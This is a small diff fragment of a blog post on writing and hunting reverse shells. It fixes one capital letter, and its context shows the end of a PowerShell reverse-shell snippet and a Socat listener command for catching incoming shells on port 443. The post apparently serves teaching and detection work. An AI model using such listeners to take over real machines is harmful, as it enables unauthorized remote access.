AandersonL/aandersonl.github.io/_posts/2020-06-14-reverse-shells-write-and-hunt-part-1.markdown

 $client.Close();
 ```

-In our "attacker" machine i will use [Socat](http://www.dest-unreach.org/socat/) instead Netcat, because this give us a lot of new options that Netcat will no support, such as fork connections to allow multiple connections, create an SSL Channel and so on.
+In our "attacker" machine I will use [Socat](http://www.dest-unreach.org/socat/) instead Netcat, because this give us a lot of new options that Netcat will no support, such as fork connections to allow multiple connections, create an SSL Channel and so on.

 ```shell
 sudo socat -d -d TCP4-LISTEN:443,fork STDOUT